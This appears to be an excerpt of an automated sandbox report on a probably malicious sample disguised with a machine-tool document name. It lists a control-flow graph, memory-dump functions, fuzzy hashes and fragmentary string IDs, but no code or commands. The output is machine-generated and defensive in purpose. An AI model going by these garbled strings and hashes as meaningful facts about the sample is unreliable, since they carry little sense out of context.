                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1956 119008-119025 1957 119031-11903d 1956->1957 1958 119027-11902c 1956->1958 1961 11904d-119052 1957->1961 1962 11903f-119041 1957->1962 1959 1193c6-1193cb 1958->1959 1961->1959 1963 119049-11904b 1962->1963 1963->1961 1964 119057-119063 1963->1964 1966 119073-119078 1964->1966 1967 119065-119071 1964->1967 1966->1959 1967->1966 1969 11907d-119088 1967->1969 1971 119132-11913d 1969->1971 1972 11908e-119099 1969->1972 1975 1191e0-1191ec 1971->1975 1976 119143-119152 1971->1976 1977 11909b-1190ad 1972->1977 1978 1190af 1972->1978 1985 1191fc-11920e 1975->1985 1986 1191ee-1191fa 1975->1986 1987 119163-119172 1976->1987 1988 119154-11915e 1976->1988 1979 1190b4-1190b6 1977->1979 1978->1979 1981 1190d6-1190db 1979->1981 1982 1190b8-1190c7 1979->1982 1981->1959 1982->1981 1992 1190c9-1190d4 1982->1992 2000 119210-11921c 1985->2000 2001 119232-119237 1985->2001 1986->1985 1997 11923c-119247 1986->1997 1995 119174-119180 1987->1995 1996 119196-11919f 1987->1996 1988->1959 1992->1981 2004 1190e0-1190e9 1992->2004 2006 119182-119187 1995->2006 2007 11918c-119191 1995->2007 2010 1191a1-1191b3 1996->2010 2011 1191b5 1996->2011 2008 119329-119334 1997->2008 2009 11924d-119256 1997->2009 2017 119228-11922d 2000->2017 2018 11921e-119223 2000->2018 2001->1959 2020 1190f5-119104 2004->2020 2021 1190eb-1190f0 2004->2021 2006->1959 2007->1959 2023 119336-119340 2008->2023 2024 11935e-11936d 2008->2024 2025 119258-11926a 2009->2025 2026 11926c 2009->2026 2012 1191ba-1191bc 2010->2012 2011->2012 2012->1975 2015 1191be-1191ca 2012->2015 2034 1191d6-1191db 2015->2034 2035 1191cc-1191d1 2015->2035 2017->1959 2018->1959 2030 119106-119112 2020->2030 2031 119128-11912d 2020->2031 2021->1959 2040 119342-11934e 2023->2040 2041 119357-11935c 2023->2041 2042 1193c1 2024->2042 2043 11936f-11937e 2024->2043 2028 119271-119273 2025->2028 2026->2028 2032 119283 2028->2032 2033 119275-119281 2028->2033 2049 119114-119119 2030->2049 2050 11911e-119123 2030->2050 2031->1959 2039 119288-11928a 2032->2039 2033->2039 2034->1959 2035->1959 2046 119296-1192a9 2039->2046 2047 11928c-119291 2039->2047 2040->2041 2054 119350-119355 2040->2054 2041->1959 2042->1959 2043->2042 2052 119380-119398 2043->2052 2055 1192e1-1192eb 2046->2055 2056 1192ab 2046->2056 2047->1959 2049->1959 2050->1959 2065 1193ba-1193bf 2052->2065 2066 11939a-1193b8 2052->2066 2054->1959 2062 11930a-119316 2055->2062 2063 1192ed-1192f9 call 118e78 2055->2063 2058 1192ae-1192bf call 118e78 2056->2058 2068 1192c1-1192c4 2058->2068 2069 1192c6-1192cb 2058->2069 2078 119318-11931d 2062->2078 2079 11931f 2062->2079 2076 119300-119305 2063->2076 2077 1192fb-1192fe 2063->2077 2065->1959 2066->1959 2068->2069 2070 1192d0-1192d3 2068->2070 2069->1959 2073 1192d9-1192df 2070->2073 2074 1193cc-1193f4 2070->2074 2073->2055 2073->2058 2083 119400-11940b 2074->2083 2084 1193f6-1193fb 2074->2084 2076->1959 2077->2062 2077->2076 2080 119324 2078->2080 2079->2080 2080->1959 2088 119411-11941c 2083->2088 2089 1194b3-1194bc 2083->2089 2085 119581-119585 2084->2085 2094 119432 2088->2094 2095 11941e-119430 2088->2095 2092 119507-119512 2089->2092 2093 1194be-1194c9 2089->2093 2102 119514-119526 2092->2102 2103 119528 2092->2103 2104 11957f 2093->2104 2105 1194cf-1194e1 2093->2105 2096 119437-119439 2094->2096 2095->2096 2097 11943b-11944a 2096->2097 2098 11946e-119480 2096->2098 2097->2098 2109 11944c-119462 2097->2109 2098->2104 2113 119486-119494 2098->2113 2107 11952d-11952f 2102->2107 2103->2107 2104->2085 2105->2104 2114 1194e7-1194eb 2105->2114 2107->2104 2111 119531-119540 2107->2111 2109->2098 2132 119464-119469 2109->2132 2120 119542-11954b 2111->2120 2121 119568 2111->2121 2124 1194a0-1194a3 2113->2124 2125 119496-11949b 2113->2125 2117 1194f7-1194fa 2114->2117 2118 1194ed-1194f2 2114->2118 2122 119500-119503 2117->2122 2123 119586-1195b6 call 118f98 2117->2123 2118->2085 2135 119561 2120->2135 2136 11954d-11955f 2120->2136 2128 11956d-11956f 2121->2128 2122->2114 2126 119505 2122->2126 2143 1195b8-1195cc 2123->2143 2144 1195cd-1195d1 2123->2144 2124->2123 2127 1194a9-1194ac 2124->2127 2125->2085 2126->2104 2127->2113 2130 1194ae 2127->2130 2128->2104 2131 119571-11957d 2128->2131 2130->2104 2131->2085 2132->2085 2137 119566 2135->2137 2136->2137 2137->2128
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 4'Zr$4'Zr$;Zr
                                                                                                                                                                                                                          • API String ID: 0-2780832812
                                                                                                                                                                                                                          • Opcode ID: c7c3baa584293d0d491f91071030d0ca406e0e0d39a38e0a4c9eda64342ec38f
                                                                                                                                                                                                                          • Instruction ID: 6b8ac3d6649b8b2561b62c04f340363f362e67ba6eec6c570336fa2dde8c9095
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7c3baa584293d0d491f91071030d0ca406e0e0d39a38e0a4c9eda64342ec38f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AF18E303146018FDB1D9A3AC9647BD7BA6AF81714F1940BAE422CF3A1EB29DCC1D751
                                                                                                                                                                                                                          Function 00118410 Relevance: 3.2, Strings: 2, Instructions: 695COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $Zr$$Zr
                                                                                                                                                                                                                          • API String ID: 0-993235432
                                                                                                                                                                                                                          • Opcode ID: c75df92c92e35e955c91514aea2c351e2ea4d84eec6619761474816be95fa15b
                                                                                                                                                                                                                          • Instruction ID: ff5a2c500508f0dd49a5886cdda6a706a4f4c268953f66e71a0b0141f27cd1d9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c75df92c92e35e955c91514aea2c351e2ea4d84eec6619761474816be95fa15b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A526534A003088FEB59EFA4D951BDEBBB6EF84300F1085AAD00A6B3A5DF355E459F51
                                                                                                                                                                                                                          Function 0011A368 Relevance: 3.1, Strings: 2, Instructions: 633COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: (oZr$4'Zr
                                                                                                                                                                                                                          • API String ID: 0-2683408296
                                                                                                                                                                                                                          • Opcode ID: 18267e98d51f2ea1e476f1b0634f0a5e6cac815e83111d9226d25eefc3b47353
                                                                                                                                                                                                                          • Instruction ID: 19e8f370e15dba1449734a74d4e8a5a8fcf54977aee958ec6fc35d96256c901a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18267e98d51f2ea1e476f1b0634f0a5e6cac815e83111d9226d25eefc3b47353
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92426931A01209DFCB19CF68C584AAABFF2BF88315F568565E445DB2A1D730ECC1CB62
                                                                                                                                                                                                                          Function 00110CA0 Relevance: 3.0, Strings: 2, Instructions: 539COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: LRZr$a)6$b)6\b)6
                                                                                                                                                                                                                          • API String ID: 0-2801096850
                                                                                                                                                                                                                          • Opcode ID: 0383b2214858892c6d0f66aa2da68cda8f182f5c0401b1f5af499ae60020a812
                                                                                                                                                                                                                          • Instruction ID: 5562bcb21023cac01ac7d8f55817219ca23fc4b208713b41664beb0ac86175c6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0383b2214858892c6d0f66aa2da68cda8f182f5c0401b1f5af499ae60020a812
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47522635A10619CFDB54DFA4DDA6A8DB7B2FB4D301F5081A9D409A7764DB382E82CF40
                                                                                                                                                                                                                          Function 00115EB8 Relevance: 2.8, Strings: 2, Instructions: 323COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: H^r$H^r
                                                                                                                                                                                                                          • API String ID: 0-1371310301
                                                                                                                                                                                                                          • Opcode ID: ea1e8147cb5112d17d32d4be727cc3eb92ae63a28ed3ddbe0d26eaa0b72087b8
                                                                                                                                                                                                                          • Instruction ID: 3cabb70c1031790d3af535957e579ef8f2a15d88da00ae050694fc284a511f9d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea1e8147cb5112d17d32d4be727cc3eb92ae63a28ed3ddbe0d26eaa0b72087b8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74B1BE307086518FEB199B68C854BBA7BA2ABC9310F158579E846CB3A1DF75CC81CB91
                                                                                                                                                                                                                          Function 00116418 Relevance: 2.7, Strings: 2, Instructions: 233COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: ,^r$,^r
                                                                                                                                                                                                                          • API String ID: 0-210990425
                                                                                                                                                                                                                          • Opcode ID: 97ce8cacf79101d2aa184db87d12e216889915bb09d07975576f52cfa2cc5024
                                                                                                                                                                                                                          • Instruction ID: fcefd925710418966f3125bd8c53d0729b0d0f5ebc771f7ab353bc1ff327a033
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97ce8cacf79101d2aa184db87d12e216889915bb09d07975576f52cfa2cc5024
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F916D34A00615CFDB5CCF69C894AE9BBB2BF89350B268179D405DB369DB32EC81CB51
                                                                                                                                                                                                                          Function 00113C40 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: X^r$X^r
                                                                                                                                                                                                                          • API String ID: 0-3865914524
                                                                                                                                                                                                                          • Opcode ID: cff27992c1ac5b53b99cef3777b2cd465ee9ed4e7518806c6003624d89de2d0e
                                                                                                                                                                                                                          • Instruction ID: a06f9aaa8621dfe2944aebba4edc8da93dc802d8e1acca048affb5d17bac2fb0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cff27992c1ac5b53b99cef3777b2cd465ee9ed4e7518806c6003624d89de2d0e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9431F771B007214BEF1C4AB999943FEA1E6ABC4350F14413BD823E33A8DBB4CE8556D1
                                                                                                                                                                                                                          Function 0011AE71 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: (oZr
                                                                                                                                                                                                                          • API String ID: 0-4178997534
                                                                                                                                                                                                                          • Opcode ID: 2d19242ff51262a6a5a93bcea33422a1d63dedc0963827188b79acdcc6bbfeff
                                                                                                                                                                                                                          • Instruction ID: 4fbd89a483d2dcf4028e772e954c3095bb4201771763eaeabb09c88dda03d5f1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d19242ff51262a6a5a93bcea33422a1d63dedc0963827188b79acdcc6bbfeff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5419D317042009FDB099B74D855AAE7FB6EFCA710F1540AAE506DB3A1DF359C42CBA1
                                                                                                                                                                                                                          Function 00116280 Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: P #6
                                                                                                                                                                                                                          • API String ID: 0-2736223398
                                                                                                                                                                                                                          • Opcode ID: 35fbaced5bfa164960ef449d5ebf8a796b27eea92b2c53c0a79882be1c581e9c
                                                                                                                                                                                                                          • Instruction ID: 5da47ca1fa9c2b0a6241dd23daaefdb22ac2dd3ea1a621514b23fea3819924c6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35fbaced5bfa164960ef449d5ebf8a796b27eea92b2c53c0a79882be1c581e9c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA210235300A118BE72D9BA9C85496EB792FFCA7117194179E906DB3A0CF36DC428B80
                                                                                                                                                                                                                          Function 0011DE20 Relevance: .6, Instructions: 647COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 10562bdc3a5ba2b645348ca76be05cee331faf319c02bf627948ad37548c3548
                                                                                                                                                                                                                          • Instruction ID: 517a0284e5d54d6d974b8a3b25590e0540aec16d2581d1faa1e32531e53dd3d3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10562bdc3a5ba2b645348ca76be05cee331faf319c02bf627948ad37548c3548
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2212A4758317479FD2162F34FAAC13EBBA1FB0F33B340BD50E45AA54558F7A448A9A20
                                                                                                                                                                                                                          Function 00118400 Relevance: .6, Instructions: 571COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 63d3cc5fa1f5726c5b37598605247e5f97c0ad98dc506a02941387a775c7e45d
                                                                                                                                                                                                                          • Instruction ID: beb0b28d8340f44b9b0ecf981d2ecb87e73b713804ab8b103781c5ec737a9ef7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63d3cc5fa1f5726c5b37598605247e5f97c0ad98dc506a02941387a775c7e45d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52426434A002088FEB59EFE0D951BDEBBB6EF84300F1085AAD00A673A9DF355E559F51
                                                                                                                                                                                                                          Function 0011A128 Relevance: .2, Instructions: 214COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 78f3d45201325140990c1ff402495486dc38953185e4df22ecfac53f18b4efeb
                                                                                                                                                                                                                          • Instruction ID: 995da30c1a681fe67de9297272031716f633d301231e0973a2bfb0349f441b5e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78f3d45201325140990c1ff402495486dc38953185e4df22ecfac53f18b4efeb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A91CE71E01249DFCF09CFA4C844ADEBFB2FF89310F148166E805AB265D771A995CB52
                                                                                                                                                                                                                          Function 00117C50 Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: cf8d09011699c1ce1b61b05116693fa2f6391cbffc06eab01156d058dc177272
                                                                                                                                                                                                                          • Instruction ID: f6fb660833d2c7f375add77fc29bce82453be7edd5a03acf0cf5c90468a6448a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf8d09011699c1ce1b61b05116693fa2f6391cbffc06eab01156d058dc177272
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4712C347046098FCB18DF68D888AAD7BF5AF59744F1940A5E806CB3B1DB70DC81CB91
                                                                                                                                                                                                                          Function 38CA1CF0 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972950864.0000000038CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CA0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38ca0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 90d2103e38711d56a45469a0e443f8a7e432e2640b8d3b5b40008916d7b44d1d
                                                                                                                                                                                                                          • Instruction ID: ce177ff23cbf18d49f7b83c03cbb3f2f360d3daa677798a0f70f358480b4aac6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90d2103e38711d56a45469a0e443f8a7e432e2640b8d3b5b40008916d7b44d1d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5671B174E002088FDB09DFA9C991ADDBBB2EF88300F64812AD405BB365DB399946CF50
                                                                                                                                                                                                                          Function 38CA7D20 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972950864.0000000038CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CA0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38ca0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 462f9be57c39fa44ea0d943a613986927d4949e6a5b005c5de88a030f40d797c
                                                                                                                                                                                                                          • Instruction ID: 548c76b2bfd879f7b0aa3aff0f7b2ed5718c90150ca445d3c6c36f4850e6ccca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 462f9be57c39fa44ea0d943a613986927d4949e6a5b005c5de88a030f40d797c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E71B174E002188FDB19DFA9C991ADDBBB2FF88300F648529D444BB365DB399946CF50
                                                                                                                                                                                                                          Function 0011D0C1 Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ae285fa3b2a3264bc2360ae25f13ace5c1d33515658783df718d77b94d320373
                                                                                                                                                                                                                          • Instruction ID: 695382f02946940981dbe2b34cfbcd8ecd8859df429a1bd025cf16155804f3b9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae285fa3b2a3264bc2360ae25f13ace5c1d33515658783df718d77b94d320373
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6519274E012089FDB48CFA9D9949DDBBF2BF89300F248169E819AB365DB31A941CF50
                                                                                                                                                                                                                          Function 00114120 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 26dcf33a68e4652f84ae55c6f7d37cfaa93df043dd91d0b93fe00ebd602b3659
                                                                                                                                                                                                                          • Instruction ID: d5b66d473cb920118be89b14fad9750c19690436381c22e76329f37f10781951
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26dcf33a68e4652f84ae55c6f7d37cfaa93df043dd91d0b93fe00ebd602b3659
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF518F75E01208CFCB48DFA9D5949DDBBF2FF89310B209469E809AB364DB35A852CF50
                                                                                                                                                                                                                          Function 0011A283 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: a0bd907e246b4cfecd100bc288268a8557aff3500bee3210f13ba41232973e76
                                                                                                                                                                                                                          • Instruction ID: 356f0bc9f679220514972fddcb658a3112d6adb3dba3b6b2e37cb110d213168e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0bd907e246b4cfecd100bc288268a8557aff3500bee3210f13ba41232973e76
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D651AD31A05259DFCF09CFA4C884BDDBFB2BF49310F448066E811AB265D371A994DBA2
                                                                                                                                                                                                                          Function 001155D8 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 295ce35018299fb4a30876f397dc9314697330c84d5758212df0ef3ef8f4805e
                                                                                                                                                                                                                          • Instruction ID: 52def5cbd3971a9d1d314c680345154d7035adf5edde81a9cec85a01c628ee4b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 295ce35018299fb4a30876f397dc9314697330c84d5758212df0ef3ef8f4805e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A316E3570450ADFDF099FA4D855AEE3BA2FB89310F404039F9069B2A5CB39DD61DBA0
                                                                                                                                                                                                                          Function 38CA1CE6 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972950864.0000000038CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CA0000, based on PE: false
